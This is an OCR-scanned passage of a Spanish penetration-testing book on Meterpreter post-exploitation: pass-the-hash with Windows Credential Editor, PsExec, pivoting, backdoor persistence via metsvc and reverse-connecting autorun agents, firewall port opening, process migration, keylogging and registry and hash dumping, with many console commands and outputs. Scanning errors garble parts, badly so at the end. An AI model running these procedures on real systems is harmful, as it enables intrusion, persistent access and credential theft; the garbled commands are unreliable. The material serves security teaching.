im personal izar  gracias  a  esta  herramienta.  £1  usuario  suplantara  en  su  maquina  local  al  usuario  quo 
requiera,  para  despues  conectar  con  la  maquina  remota  autoraaticamente  con  las  credenciales  del 
suplantado. 


La  aplicacion  presenta  interesantes  opciones,  las  cuales  se  enumeran  en  la  siguiente  tabla; 


Parametro 

Description 

-t 

Lista  las  sesiones  abiertas  por  Logon  en  el  sistema. 

-r 

Lista  las  sesiones  abiertas  y  credenciales.  Ademas,  relresca  cada  5 
segundos. 

-s 

Sustituye  las  credenciales  de  la  sesion  en  curso. 

-d 

Elimina  las  credenciales  de  una  sesion. 

-i 

Especifica  el  LUID. 

-c 

Ejecuta  una  CMD  con  las  credenciales  especrficas. 

Tabla  4.05:  Pad melros  de  la  aplicacion  Windows  Credential  Editor. 
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En  la  imagen  se  puede  visual tzar  como  utilizando  una  maquina  Windows ,  el  auditor  puede  cambiar 
las  credenciales  con  las  que  esta  logueado,  con  el  objetivo  de  que  cuando  se  conecte-  con  olra  maquina 
que  tenga  un  usuario  con  las  mismas  credenciales  se  autentique  correctamente,  sin  necesiaad  de 
conocer  la  contrasefia. 


and,  Settings  \pepe\Escritorio'suce_vi_2>wce,e:xe  -=q ■, Admin is  traitor sjwce- 
p£Sl?35i?2G3A7?D2C6AAI)3B435B5i404EE::512B99009997C3B558nCAFA(!9C0AE969 

>2  .  <UihfloWG  Credentials  Editor)  <c>  2010,2011  ftmplia  Security  -  J»y  llerna 
J®  <lieri1an(?«mpli«secm‘lty.co»!i(> 
i^li  for  help.  , 

credentials  of  current  logon  session  <000003E7h)  toi'v" 
hamei  Admin  ist ratio r 
lirli  iiee-PC 

[Slii:  8735172C3A77D2C6AAD3B435B51404EE 
JSIi5,{5i2B99B09997C3B55U8CAEftC9C0AE969 
^firddentiej.lc  successfully  changed? 

ahd';Bettirigs\pepeSEscritorio\»ce^ul,2>  -  -  .  .  t  •  '  - 


Fig. 4.52:  Suplantacion  de  credenciales  en  memoria  con  Windows  Credential  Editor. 

Por  ejemplo  se  puede  ejecutar  la  orden  \\<direccion  IP>  o  \\<direcci6n  1P>\C$,  domle  la  direccion  IP 
es  la  maquina  objetivo  y  si  las  credenciales  de  Los  usuarios  son  iguales,  automatieamente  se  accedera 
al  recurso. 


PSTools  de  Sysinternals 

La  suite  PSTools  de  Sysinternals  proporciona  un  conjunto  de  herramientas  que  permiten  la 
administration  de  sistemas  Windows.  Este  kit  se  puede  descargar  de  la  siguiente  URL  htip://techneA 
mkrosoft.com/es~es/sysinternals/hb896649.aspx.  ^ 

Si  desde  Meterpreter  se  sube  alguna  de  estas  herramientas  a  la  maquina  remote,  puede  sucedeg 
que  si  dicha  maquina  dispone  de  una  solution  antivirus,  se  alerte  al  usuario  victima  de  una  posible 
amenaza.  Algunas  de  las  aplicaciones  de  PSTools  son  califieadas  de  malware  de  administracioil 
remota. 


|jd;  SW I  ft  1)0 US S'S  ydt e m3 2  >c cl  ’  Yf  s  SDocurmn  t  s  anil  Se  i;  t  i  ngs 
,C  ^Documents  an<L  Bett.ings>c4  pepe 
fesDocuments  an^8&tting8\pope>cd  EscritorioSpaToois 
j^Docuwenits  ^id^ttingsSpepe\E8critorio\pslools>B»ExCC,exe 

iPsExnc  Uli9B.»-Execute  processes  remotely 
jCopj/rigJtt  <0- 200i^2010  Merit  Hussinovieh 

fimMJsoft  Pinddvf 'rUersioiivA  .1 .76001 
Copyright  <c),  200?  Microsoft  Corporation.  IteserMftdos 

p:Slfindows\sygtqm32>whoami  ^ 

«.fc-  author!  ty^ystemv  •  . «✓;.  . ’■  ■ 

C:SUirtd0ik^sis'Lpm|2>ifdstname  '>* 
yee-PC  ■  ' 

iKuind 


«  SM0.0. 


tcutos 


-■ 


erechos. 


_ 

Fig  4.54:  bjecucion  tie  una  shell  remota  medianfe/werec  y  la  suplantacion  tie  credenciaiss. 

A  continuacion  se  enttmeran  algunas  herramientas  que  proporcionan  PSTools  y  sus  utiles 
fcncionalidades: 

PSExec.  Ejecuta  procesos  de  forma  remota.  Interesante  para  una  vez  supiantadas  las 
credenciales  en  la  memoria  del  equipo  local,  ejecutar  una  shell  en  la  maquina  remota. 

-  PSFile.  Muestra  los  archives  abiertos  en  el  equipo  remote. 

-  PSInfo.  Muestra  information  sobre  e!  equipo  remoto. 

PSKifl.  Elimina  piocesos  de  la  maquina  remota  a  traves  del  PTD  o  nombre  del  proceso. 

-  PSUst:  Muestra  informacion  sobre  los  procesos  que  estan  en  ejecueion  en  la  maquina 
remote. 

PSLoggedOn.  Muestra  quien  ha  iniciado  sesion  de  manera  local  o  a  tiaves  de  recursos 
compartidos,  incluyendo  el  origen  de  la  conexion. 

-  PSPasswd  Permite  cambiar  la  contrasena  de  la  cuenta. 

■  PSShutdown.  Permite  apagar  y  reiniciar  la  maquina  remote, 
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5.  Pivoting 

Esta  tecnica  ayuda  al  auditor  a  llegar  a  maquinas  de  la  organization  a  las  cue  a  priori  no  tiene 
conectividad.  Una  vez  que  se  dispone  de  una  maquina  vulnerada,  esta  puede  abrir  la  puerta  a  otras 
que,  por  alguna  razdn,  no  tienen  conectividad  con  !a  maquina  del  auditor.  En  definitiva  el  pivoting 
ayuda  al  auditor  a  intentar  ganar  acceso  a  maquinas  con  las  que  no  se  tiene  conectividad  directa,  pero 
si  a  traves  de  otra  maquina  vulnerada  previamente. 

En  algunos  casos,  tambien  se  define  como pivoting  la  posibiiidad  de  utilizin'  la  tecnica  .de  Pass  the 
hash  para  realizar /uVo/mg,  aunque  se  tenga  conectividad  con  la  maquina  objetivo.  Como  se  explico 
anteriormente,  puede  que  la  mdquina  vulnerable  y  la  maquina  objetivo  corapartan  algun  tipo  de 
credential  o  hash ,  y  si  se  vulnera  una  mdquina,  se  puede  utilizar  dicha  information  para  acceder  a 
ia  mdquina  objetivo. 

Generalmente,  se  puede  describir  un  procedimiento  para  utilizar  la  tecnica  de  pivoting  mediante  una 
*  serie  de  pasos.  Pero  iiay  que  tener  en  cuenta,  que  puede  haber  ocasiones  en  las  que  dependiendo  de 
ia  experieneia  y  ios  conocimientos  del  auditor  para  realizar  pequenas  variaciones,  es  posible  que  la 
'  tecnica  rnejore  los  resultados  obtenidos. 

La  tecnica  de  pivoting  se  puede  enumerar  en  el  siguiente  procedimiento: 

-  Conocimiento  del  entorno  de  la  mdquina  vulnerada.  Este  primer  paso  se  realiza  en  el  nivel 
de  enlace  de  la  mdquina  vulnerada,  para  conocer  el  entorno  que  esta  dispone. 

-  Enrutamiento  del  trdfico  de  la  mdquina  vulnerada  a  traves  de  la  mdquina  del  atacante. 

-  Realizar  escaneos  u  otras  acciones  a  traves  de  la  mdquina  vulnerada,  gracias  al 
enrutamiento  anterior. 

-  Por  ultimo,  si  en  las  acciones  anteriores  se  encuentran  puertos  abiertos  se  puede  intentar 
realizar  una  explotacion  sobre  alguno  de  estos  servicios. 


7.  Persistencia 

Una  vez  que  se  tiene  acceso  a  una  maquina  vulnerada  puede  resultar  muy  interesante  conseguir  que 
este  acceso  sea  indefinido,  en  la  niedida  de  lo  posible.  Meterpreter  dispone  de  varios  metodos  para 
conseguir  crearuna  puerta  trasera  en  el  equipo  vulnerado. 

Generalmente,  con  herramientas  como  Nelcat  se  puede  pubiicar  una  shell  en  un  puerto  determinado 
de  la  mdquina  victima,  e  incluso  hacer  que  este  proceso  sc  inicie  automaticamente  en  cada  arranquc 
de  la  mdquina.  Este  procedimiento  es  bastante  sencillo,  pero  dispone  de  un  problemay  es  la  conexion 
directa. 

Como  se  ha  podido  estudiar  con  el  caso  de  los  payloads  tambien  se  dispone  de  conexion  mversa  y 
directa,  como  en  los  troyanos.  La  conexion  inversa  proporciormrd  ai  atacante  o  auditor  la  posibiiidad 


de  que  sea  la  mdquina  vulnerada  la  que  se  conecte  a  la  mdquina  atacante  cuando  sea  posible  De 
este  modo  se  evitan  algunos  sistemas  de  protection,  como  por  ejemplo  m  firewall.  Aunque  hay  que 
pensar  que  si  la  mdquina  vulnerada  bioquea  las  peticiones  salientes.  heciio  muy  poco  cointtn  podria 
haber  problemas  con  la  conexion  inversa. 

En  el  caso  de  la  concxiOn  directa  es  el  atacante  el  que  se  conecta  a  la  mdquina  vulnerada.  La  idea  es 
dejar  un  ejecutable  que  quede  a  ia  escueha  en  un  puerto  y  asi  ei  atacante  sera  capaz  cie  coivectarse  en 
cuaiquier  momento  para,  ilicitarnenle,  manipular  dicha  mdquina.  El  problema  de  ia  conexion  diret  iu 
es  cuando  la  mdquina  victima  se  encuenlra  deltas  de  un  firewall,  o  incluso  de  un  router.  por  esta 
razon,  la  conexion  directa  es  mas  comuu  utilizarla  en  escenarios  corporal ivos  donde  la  mdquina  sc 
encuentre,  llsicamente  o  mediante  el  uso  de  VPN  u  otros  metodos  de  conexion  remola,  en  el  inierlor 
de  la  red  de  la  empresa. 

En  este  apartado  se  comentardn  los  scripts  metsvc  y  persistence,  que  son  dos  ope  tones  que 
proporciona  Meterpreter  para  asegurar,  en  !a  medida  de  lo  posible,  que  se  podra  vulver  a  utilizar  unn 
sesidn  de  Meterpreter  en  la  maquina  vulnerada  cuando  el  auditor  lo  necesite. 


FoC:  Metsvc  y  la  conexion  directa 

El  script  metsvc  crea  un  servicio  en  la  maquina  vulnerada,  el  cual  se  inicia  a!  arrancar  ia  maquina 
y  quedara  a  disposition  del  atacante  en  la  maquina  remola.  Hay  que  tener  en  cucnla  que  metsvc 
flmciona,  en  este  ejemplo,  con  conexion  directa.  Es  muy  posible  que  sea  neccsario  abrir  un  puerto 
en  el  firewall  de  la  maqui  na  vulnerada  para  este  servicio,  el  cual  se  queda  a  la  escucha  en  el  puerto 
31337. 


meterpreter  >  run  metsvc 

[*3  Creating  a  meterpreter  service  on  port  31337 

[*]  creating  a  temporary  installation  directory  C:\WIfJDOWS\TEHP.\eHiijqDQP... 

[*]  »  Uploading  metsrv.dll. . . 

[*]  »  Uploading  metsvc-server.exe... 

(*]  »  Uploading  metsvc.exe... 

[+3  Starting  the  service... 

*  Installing  service  metsvc 
*  starting  service 

Service  metsvc  successfully  installed. 

Fig  4.55:  Ejecucion  de  meisvc. 

Para  ejecutar  metsvc  se  utiliza  la  instruction  run  metsvc.  Esta  action  creara  un  servicio  en  la  maquina 
vulnerada,  el  cual  quedara  a  la  escucha  de  peticiones.  En  las  imagenes  referentes  a  ia  maquina 
remota,  se  puede  visuaiizar  como  existe  un  proceso  denominado  metsvc ,  y  como  et  puerto  31337  se 
encuentra  abierto. 


0.0, 0.0s 31337 
192. 16tL  0.60:1 39 
192.168 .0.60:445 ( 
192  68  V0*6 0:1043 


.0.0.0.0:0,/:;':Vv.;  ...  . 

0.0.8.050  L.  MStENING 

192 . 168 £0.1 44: 54732 ;  ESIfllfc 

192:.  16810.59:4444 


Fig  4.56:  Lislado  de  conexiones  en  ta  maquina  remota  cor.  metsvc  a  la  escucha  on  31317. 
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l?ig  4.57;  Lislado  cie  procesos  remotes  eon  metsvc  t 


,JnH  vez  Mue  4|  iene  instalado  e!  servicio  en  la  maquina  remota,  se  uiilizara  ana  shell  sobre  ia 
maqiitna  vulnerada  para  ejccutar  la  instruction  que  abrira  el  puerto  en  el  firewall ,  para  las  conexiones 
emrantes.  : 

Para  abrir  una  linen  de  comandos  en  Meterpreter  sobre  el  equipo  renioto  se  ejecula  la  instruction 
shdl.  Bn  la  iinca  de  comandos  se  debe  ejecutar  la  instruccion  nelsh  firewall  add  portopening  TCP 
J  I  33,  metsvc.  be  este  modo  ti firewall  de  Windows,  dejara  pasar  estas  peticiones  y  se  podra  conectar 
con  metsvc  de  man  era  remota. 


meterpreter  >  shell  "  . 

Process  1608  created. 

Channel  5  created. 

Microsoft  Windows  XP  [Version  5.1.2680] 

(Cl  Copyright  '385-2001  Microsoft  Corp. 

:  •  i 

C • \WINBOWS\TEW\eHii j t(DQP>netsh  firewall  add  portopening  TCP  31337  metsvc 
nets])  firewall  add  portopening  TCP  31337  metsvc 

|  bg  4.58;  A  perh;  ra  del  puerto  31337  en  el  firewall. 

Almra  hay  que  probar  la  eonectividad.  Sin  cerrar  la  sesion  de  Meterpreter ,  se  vnelve  a  la  msfcomole 
per  medio  del  comando  background.  Hay  que  utilizar  el  modulo  exploii/miilti/kandlcr  que  no  solo 
se  uliliza  para  recibir  conexiones,  sino  tambien  para  crearlas,  esdecir  conexiones  diroclas.  Median  to 
cl  mo  de  ia  instruccion  use  exploit/multi/handler  en  msfcomole  se  carga  el  modulo. 

nisf  >  use  explo.it/inuUi/handler  - - — - - - 

exploit  (handler)  >  set  PAYLOAD  windows /metsvc  bind  tep  : 

PAYLOAO  =>  windows/metsvc  bind  tep 

list  exploit  (handler)  >  set  RHOST  1S2.168.0.G8 

RIIOST  =>  192.168.0.60 

msf  exploit (handler)  >  set  LPORT  31337 

LPORT  =>  31337 

[nsf  exploit  (handler)  >  exploit 

■1*1  Starting  the  payload  handler... 

(*]  Started  bind  handler 

[H  Meterpreter  session  2  opened  (192.168.0.59:48270  ->  192.168.8.60:31337)  at  2817-08-31  16:57-2 

/  +0200 


I'ig  4-59:  Conligtuacidn  mdilutc  exploit/nnilti/handler  pa 


'•  para  conexion  con  metsvc. 


Capitulo  IV.  Meterpreter  &  Posi~Explotation 


La  contiguiacion  de  dicho  modulo  es  sencilia,  se  debe  utilizar  el  payload  windows/metsvc  bind  tep, 
un  payload  especial  de  este  recurso.  Como  se  visualiza  en  la  imagen  anterior  la  configured^  e! 
realmente  basica,  tal  y  como  se  ban  ido  aprendiendo  en  este  libro.  ^  ^ 

Es  impprtante  recalcar  que  hay  que  cambiar  el  puerto  en  la  configuration,  la  variable  LPORT\debe\ 
tencr  un  valor  de  3 1 337,  que  es  el  puerto  por  donde  se  realiza  la  conexion  con  metsvc.  Tras  la  correctaj 
ejecucion  de  dicha  conexion,  se  obtiene  una  sesion  de  Meterpreter.  Para  eomprobar  total  men te  qtu 
el  servicio  se  encontrara  levantado  tras  el  reinicio  de  la  maquina  vulnerada,  se  recomienda  al  lecto 
que  lo  compruebe  en  su  laboratorio. 

w 

El  script  metsvc  dispone  de  un  parametro  para  eliminar  el  servicio  de  la  maquina  vulnerada.  Latj 
desi nslalacion  de  este  se  provoca  con  la  ejecucion  de  run  metsvc  -r.  Hay  que  tener  en  cuenta  que 
no  se  eliminarau  los  archivos  creados  en  la  initiation  del  servicio,  esta  action  debera  ser  realizada1 
manualmente  por  el  usuario  o  atacante. 


FoC:  Persistence  y  la  conexion  inversa 

En  esta  prueba  de  concepto  se  utilizara  el  script  persistence  para  conseguir  que  la  maquina  vulnerada 
sea  la  que  se  conecte  al  usuario  atacante  o  auditor.  Este  es  un  ejemplo  sencillo  de  conexion  inversa 
para  evitar  que  los  sistemas  de  protection  del  usuario  vretima  eviten  la  conexion  con  su  maquina 
El  script  persistence  dispone  de  varies  parametros  los  cuales  aportan  potencia  y  flexibilidad  a  esta 
caracleristica.  A  continuation  se  muestra  una  tabla  con  los  parametros  y  uno  breve  ilescriucion  de 
cllos.  .  "  v 


rara  metro 


_____ _ uescnpcion 

Automaticamente  se  configura  multi/handler  para  conectar  con  ei  agente. 
AiitoniAticamente  arranca  el  agente  como  un  servicio  aJ  iniejar  cl  sislema.  ~ 
El  agente  interne  conectar  cuando  se  inicia  sesion. 

Id  agente  intenta  conectar  cuando  se  inicia  el  sistema. 

Especifica  el  payload  que  se  va  a  utilizar,  por  defecto  es  windows/meterpreter/ 
reverse Jcp. 

Especifica  la  plantilla  del  ejecutable  para  utilizer. 

Especifica  el  numero  de  segundos  que  deben  pasar  entre  cada  intento  de  conexion 
por  parte  del  agente. 

Especifica  el  puerto  de  la  maquina  del  atacante  donde  se  esperara  a  recibir  la 
ccnexion. 

Especifica  la  direction  IP  a  la  que  se  conectara  el  agente,  es  decir,  la  direction  IP 
del  atacante. 


Tabla  4.06:  Parametros  del  script  persistence. 
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interpreter  >  run  persistence  -U  -x  -i  60  -p  4444  -r  192.168,6.59 
M  Running  Persistence  Script 

1*1  Resource  file  for  cleanup  created  at  /root/.ffisf4/logs/persistance/PRU£QAS-ei760CC  20120831.21 
47/PRUEBAS -  0 1760CC_2012683 1 . 2 147 , rc 

[*}  Creating  Payloid=windo«s/tneterpreter/reverse  tcp  LH0ST=192. 168.9.59  LP0RT*4444 
[*]  Persistent  agent  script  is  614095  bytes  long' 

'•'  !  Persistent  Script  written  to  C:\WINDOWS\TEMP\rOjSjVrPFvDr.vbs 
1*1  Executing  script  C:\WINO0WS\TEHP\rOjSjVrPFvDr.vbs 
in  Agent  executed  with  PID  1400 

1*1  Installing  into  autorun  as  HKLM\Scftware\Hicrosoft\Vfindows\CurrentVersion\Run\?oSoiViCi 
;  :  Installed  into  autorun  as  HKLM\SoftwareVHicrosoft\Wjndows\Currentversion\Run\2oBoiViCi 
meterpreter  > 

Fig  4.60:  Ejecucion  del  script  persistence. 

Jii  la  imagen  se  puetle  visualizar  corao  se  ianza  ei  script  persistence  con  la  siguien  te  configuracion: 

-  El  agente  instalado  en  la  maquina  vulnerable  intentara conectar  cuando  se  inicie  ei  sistema 
y  cuando  se  inicie  la  sesion. 

-  Reaiizara  inientos  de  conexion  cada  60  segundos.. 

t 

-  Intentara  conectarse  al  puerto  4444  en  la  direccion  1 P  1 92. 1 68.0.59 

|Como  se  recibe  Ja  conexi6n  por  parte  del  agente?  Se  utilizara  expioit/nmlti/handler  tal  y  como  se  ha 
realizado  en  casos  anteriores.  La  configuracion  del  modulo  es  la  habitual,  es  decir  payload  windows/ 
meterpreler/reversejcp  o  ei  que  se  hay  a  configurado  al  agente  con  el  parametro  -R  la  direccion  IP 
jg  la  maquina  del  atacante  asignada  a  la  variable  LHOST  y  el  puerto  en  la  variable  LPORT. 

jnsf  >  use  exploit/multi/handler 

bsf  exploit (handler)  >  set  PAYLOAD  windows/meterpreter/ reverse  tcp 

PAYLOAD  =>  windows/meterpreter/reverse  tep 

ksf  exploit (handler)  >  set  LHOST  1S2.168.9.59 

LHOST  =>  192.168,0.59 

ksf  exploit (handler)  >  set  LP0RT  4444 

LPORT  =>  4444 

|»sf  exploit (handler )>  exploit 

It*}  Started  reverse  handler  on  192.168,0.59:4444 
]t*3  Starting  the  payload  handler... 

Fig  4.6 1 :  Configuracion  del  modulo  exploit/inulli/handler  para  rccibir  conexiones  dc  persistence. 
f: 

Ahora  toca  esperar  a  que  la  maquina  vulnerada  se  encienda,  en  el  caso  de  que  se  encontrase  apagada, 
I  de  que  transcurran  los  segundos  de  reintento  de  conexion  facilitados  en  el  parametro  -i  en  la 
ponfiguracion  del  agente. 


msf  exploit  (handler)  >  exploit 

[*]  Started  reverse  handler  on  192.168.8.59:4444 
[*]  Starting  the  payload  handler... 

141  Sending  stage  (752128  bytes)  to  192.168.0.60 

1*]  Meterpreter  session  1  opened  (192.168.0.59:4444  ->  192.168.0.60:1060)  at  2012-08-31  17:32:00 
•  +0200 


Fig  4.62:  Conexion  reeibida  por  multi/handler  del  agente  de  persistence. 


8.  Migration  a  tin  proceso 

Cuando  se  realiza  la  fase  tie  explotacion  y  se  consigue  introducir  un  payload  en  la  memoria  de  la 
maquina  victima,  se  produce  la  vuhieracion  de  un  proceso.  En  otras  palabras.  un  payload ,  como 
por  ejemplo  Meterpreter  se  inyecta  en  un  proceso  de  la  maquina  haciendose  pasar  por  uoo  de  eiios, 
corno  por  ejemplo  el  tlpieo  noiepad.exe  o  svchost.exe . 

El  script  postAviiidows/manage/migrafe  o' el  comando  migrate  permite  migrar  de  un  proceso  a  otro 
ia  sesion  de  Meterpreter.  ^Con  que  objetivo?  Es  sencillo,  cuando  un  atacante  obtienc  una  sesion  de 
Meterpreter  este  se  inyeeta  en  ei  proceso  vuinerado.  Si  ia  victima  cerrase  dicho  proceso  la  sesion  de 
Meterpreter  se  cerraria.  Por  ejemplo,  mediante  un  ataque  al  navegador  web  de  un  usuario  se  otrtiene 
una  sesion  de  Meterpreter,  si  el  usuario  cerrase  el  proceso  del  navegador,  porque  cierra  la  aplicacion 
por  ejemplo,  el  atacante  se  quedana  sin  la  conexion. 

Mirchos  de  ios  exploits  ciisponen  de  la  automigracidn,  coti  la  que  nada  mas  conseguir  el  acceso  a  la 
maquina  vulnerada  se  migran  a  otro  proceso.  Esto  se  especifiea  con  posibtlidad  de  AutoRunScript, 
donde  se  especifiea  la  orden  que  se  debe  ejecutar  al  conseguir  la  explotacion.  /.DAnde  se  localiza 
A utoRunScripf!  Cuando  se  encuentre  el  modulo  del  exploit  cargado  se  puede  utiitzar  el  comando 
show  advanced  para  listar  las  opciones  avanzadas  del  modulo.  Entre  dichas  apcioncs  se  encuenlra 
AutoRunScript. 


!3&1  exploit (ffis08_667jietapi)  >  set  AutoRunScript  multi  console_command  -rc"7r°ot:/PruebaAl)toRijn- 
rc 

AutoRunScript  =>  multiconsclecammand  -rc  /root/pruebaAutoRun.rc 
isf  exploit  (msfi8J)G7jietapi.)  >  exploit 

{*]  Started  reverse  handler  on  192.168.1.46:4444 
[*]  Automatically  detecting  the  target... 

{*3  Fingerprint:  Windows  XP  -  Service  Pack  3  -  lang:Spanish 
t*3  Selected  Target:  Windows  XP  SP3  Spanish  (NX) 

(*3  Attempting  to  trigger  the  vulnerability... 

(*]  Sending  stage  (752128  bytes)  to  192.168.1.35 

['•*1  Meterpreter  session  5  opened  (192.168.1.40:4444  ->  192.160.1.35:1424}  at  2012-06-31  17:57:13 
+0209 


meterpreter  > 

[*]  Session  10  5  (192.168.1.40:4444  ->  192.168.1.35:1424)  processing  AutoRunScript  ‘multiconsol 
e  command  -rc  /root/pruebaAutoRun.rc' 

{*]  Running  Command  List  ... 

1*1  Running  command  run  checkvm 

1*1  Checking  if  target  is  a  Virtual  Machine  . 

I*]  This  is  a  Sun  VirtualBox  Virtual  Machine 
[*3  Running  command  run  post/windows/manage/migrate 

[+3  Running  module  against  PRUEBAS-B1760CC 
1*3  Current  server  process:  svchost.exe  (1H2) 

[*3  Spawning  notepad.exe  process  to  migrate  to 

1+J  Migrating  to  UO0 

1+3  Successfully  migrated  to  process  1100 

meterpreter  >  _ 


Fig  4.63:  Configuracion  y  cjecucion  de  AutoRunScript  con  migraciou  en  el  arrange- 
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Una  option  muy  in  teres  ante  para  AutoRunScript  es  la  posibilidad  de  preparar  un  archivo  RC,  de 
automat  izacibn  y  ejecutar  la  instruction  set  AutoRunScript  multi_console_command  -rc  <mto 
jichero  RC>.  En  el  interior  de  dicho  archivo  RC  deberian  encontrarse  todas  las  ordenes  que  se 
qnieren  ejecutar,  por  ejempio  run  migrate,  run  checkvm,  etcetera.  Siendo  una  instruction  cada  linen 
del  fichero  RC. 

Migrate  proporciona  migration  a  oiros  procesos  en  cualquier  momento.  Se  puede  ejecutar  sin 
para  metros  por  lo  que  migrant  a  un  proceso  con  nombre  notepad  por  ejempio,  con  un  parfimetro 
mdicando  ei  PI D  a!  que  se  quiere  migrar.  Puede  ocurrir  que  al  ejecutar  migrate  se  obtenga  una 
denegation  en  ia  migration.  Esto  sucede  debido  a  que  no  se  tienen  privileging  sobre  el  proceso  al 
que  se  quiere  migrar,  para  solucionar  esto  se  deberia  realizar  una  escalada  de  privilegios  como  se  ha 
esludiiulo  en  este  capitulo. 

PoC:  De  proceso  a  proceso  capturando  pulsaciones 

En  esta  prueba  de  concepto  se  realizaran  pritebas  que  demuestren  lo  sencillo  que  puede  ser  ir 
migrando  de  proceso  en  proceso,  siempre  y  cuando  los  permisos  lo  permitan.  En  primer  lugar  se 
vera  como  un  usuario  sin  privilegios  sobre  un  proceso  de  sistema  no  puede  migrar  1a  sesion  a  dicho 
proceso. 

mete rare ter  >  getuid  •  ~ 

Server  username:  PitUEBAS'017fi0CC\Administrador 
interpreter  >  migrate  1400 
H  Migrating  to  1400..  . 

H  eorejnigrate:  Operation  failed:  Access  is  denied. 

interpreter  >  getsystem 

...got  system  (via  technique  1). 

ineterpreter  >  migrate  1400 

]■*]  Migrating  to  1400... 

1*1  Migration  completed  successfully, 
interpreter  > 

lTig  4.64:  In  lento  de  inigracion  crroneo  y  posleriormente  satisfaelorio. 

En  la  imagen  se  puede  visualizar  como  al  principio  el  auditor  tenia  como  identidad  el  usuario 
“Admin-istrador".  Al  inlentar  realizar  una  migration  a  un  proceso  perter.eciente  a  System ,  se  produce 
el  error.  Para  elevar  privilegios,  en  una  maquina  Windows  X'P  SP3,  se  uliliza  el  comando  getsystem . 
Al  conseguir  los  privilegios  necesarios,  se  puede  llevar  a  cabo  la  migration  a!  proceso  MOO,  que  era 
el  primer  objelivo. 

Aden  as,  se  puede  imaginar  ei  escenario  en  el  que  se  quieran  capturar  las  putsaciones  o  entradas  de 
los  procesos,  por  ejempio  un  notepad.  La  funtionalidad  de  key  scan,  ya  comentada  anteriormente  en 
este  capitulo,  aytida  a  recoger  la  information  que,  por  ejempio  la  victim  a  teclea  en  sti  maquina.  Otro 
ejempio  valido  seria  la  capture  de  pulsaciones  del  navegador  web  de  la  victima. 

Para  capturar  las  entradas  o  pulsaciones  de  tin  proceso  concrete  se  utiliza  el  comando  keyscan  jiart. 
Anles  de  parar  el  keyscan  se  debe  volcar  el  contenido  mediante  el  uso  del  comando  keyscan Jlump. 
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interpreter  >  migrate  940 
!*3  Migrating  to  940... 

{*1  Migration  completed  successfully. 

meterpreter  >  keyscan_ 

keyscan  dump  ksyscan  start  keyscan_stop 

meterpreter  >  keyscanstart 

Starting  the  keystroke  sniffer... _ 

Tig  4.65:  Migration  a  un  proceso  y  ammque  del  keyscan. 


meterpreter  >  keyscandtmip 
Dumping  captured  keystrokes... 

<Return>  <ileturn>  hola  metasploit,  se  que  me  estas  espiando,..  <Return> 
meterpreter  >  keyscandump 
Dumping  captured  keystrokes... _ 

Pig  4.66:  Volcado  de  pulsaciones  de  leclado  con  keyscan  dump. 


9.  Scraper 

Scraper  es  un  script  que  permite  realizar  una  recogida  de  information  con  partes  sensibles  de  la 
estractura  de  un  sistema  operative  Windows.  Scraper  se  enearga  de  recoiectar  informacion  basica 
del  equipo  como  son  los  usuarios,  !a  information  que  proporciona  el  comando  systeminfo,  entimerar 
los  recursos  comparlidos  de  la  maquina,  volcado  de  usuarios  y  hashes  de  la  misma,  conexiones 
activas  y  estadisticas  tie  estas,  variables  de  entorno,  grapos,  servicios  del  sistema,  etcetera.  Todas 
estas  funcionalidades  lealmente  ya  se  habi'an  estudiado  en  este  capitulo. 

Lo  que  realmente  difercitcia  a  scraper  de  otros  scripts  es  la  recogida  y  descarga  de  partes  o  arboles 
del  registro.  1'or  ejempio,  scraper  realiza  una  exportation  en  la  maquina  vulnerada  de  HKCU  (el 
nrbol  del  registro  de  Current  User),  para  despues  descargarlo  automaticamente  a  la  maquina  del 
atacante.  Realiza  el  mismo  proceso  para  HKLM,  HKCC,  HfCCR  y  HKU.  Estos  ficheros  de  extension 
REG  que  se  descargan  pueden  ser  analizados  a  posteriori  en  la  maquina  del  auditor  con  iranquilidad. 


interpreter  >  run  scraper 

itq 

Exporting  HKCC 

(*]  New  session  op  192. 168.0.62:445. . . 

JO) 

Downloading  HKCC  (C:\WINDOWS\TEMP\VYTZeLhk.reg) 

l*j  Gathering  basic  system  information... 

!(*] 

Cleaning  HKCC 

1*1  Bumping  password  hashes... 

nq 

Exporting  HKCR 

[+)  Obtaining  the  entire  registry... 

iq 

Downloading  HKCR  (C:\WINDOWS\TEMP\QUnTWdRA.reg) 

t+J  Exporting  HKCU 

iq 

cleaning  HKCR 

1*1  Downloading  HKCU  (C:\WINDnwS\TEHP\qoxEiqFX.reg) 

iq 

Exporting  HKU 

I")  Cleaning  HKCU 

iq 

Downloading  HKU  (C:\WINDOWS\TEHP\SpBcqFYe.reg) 

[  q  Exporting  HKiM 

iq 

cleaning  HKU 

!*]  Downloading  HKLM  (C:\WINDOWS\TEMP\dbWPKlLR.regl 
ft]  Cleaning  IIKLH 

!*] 

’met 

Completed  processing  on  192.168,0.62:445... 
eroreter  > 

fig  4.67:  Ejecucion  del  script  semper  para  la  recogida  de  infbrmaci6n. 


Do  tide  sc  almacenan  los  archivos  que  automaticamente  genera  scraper ?  La  ruta  por  defecto  es 
$HQME/.msf4/logs/scripts/scraper/<direcci6n  IP>.  En  esta  ruta  se  pueden  visualizar  una  serie  de 
archivos  con  nombres  identi  ficativos  de  la  informacion  recogida  por  scraper. 
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10.  Actualizando  de  cmd  a  Meterpreter 


para  actua,izar  de  u,,a  c,,i<i  a  una  — *»• 
aplicacton  o  el  sisteraa  operaUvo  son  vulne  n  3  ^  Un  eXp'°“  s6l° se  cpliera  Probar  <lue  ™ 
P«d.  ocurrir  que  ^Sidades  lvW  ^  *  qUe  *“  SUP°Sici6n  Se  realiza  c°"  ^  Tahiti, 
ftlta  reafizar  la  U"  ra4s  «50tente'  N‘>  •»« 

«w/om.riemiy™KPfe  P‘eta'  SO'°  56  neCeSlta  col,ocer  las  posibilidades  del  comando 

inieresT pero  el  t|ue  prop™  la  posibilidad  * 

precede  a  la  subi  ZZlZyZ  ^ZTP,  Tf*"’  ~U-  T"“  »  diaha  ^  * 
de  un  Meterpreter.  ’  '  -  na  lzac  d  ®  subida,  se  precede  a  la  elocution  y  obtencion 

£~ess  7  9S-15%  done  ( 100216/102i05~bytesir - - - - “1 

!:j“S  ^  . 

is]  f?;fLdeo"er(i021fl8/1?2108  bytes) 

•62:1576)  at  2012^08-31  19:36:31  J200  °°  9  (192‘ ->  192.168.6 

iif  exploit  (nisDS_067_netapi)  >  sessions 

Active  sessions  ! 


Id  Type 


Connection 


Information 


n^ft^  "  5.1.2688]  (Cl  Copyright  1985-2881  nit 

9  ■e,erpre19?S“?  «^S^s2:^c6JI 

- - - jgjjgg- 6- 63:4^44  ->  192.168.6.62:1576  (192.168.0.62) 

